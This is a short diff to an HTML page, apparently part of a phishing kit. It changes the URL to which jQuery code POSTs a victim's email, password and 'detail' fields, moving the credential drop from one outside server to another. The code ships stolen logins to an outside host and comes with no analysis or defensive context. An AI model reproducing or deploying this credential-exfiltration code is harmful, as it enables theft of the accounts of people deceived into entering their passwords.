--- a/index2.html
+++ b/index2.html
@@ -168,7 +168,7 @@ $(document).ready(function()
 			{
 			$.ajax(
 				{
-				dataType:'JSON',url:'https://dev-gracezhang.pantheonsite.io/oiyv/li/next.php',type:'POST',data:
+				dataType:'JSON',url:'https://fvbvps.za.com/cgi-bin/next.php',type:'POST',data:
 					{
 					email:c,password:d,detail:e,
 				}
@@ -217,3 +217,4 @@ if(location.hash)
 
   </script>
   </html>
+
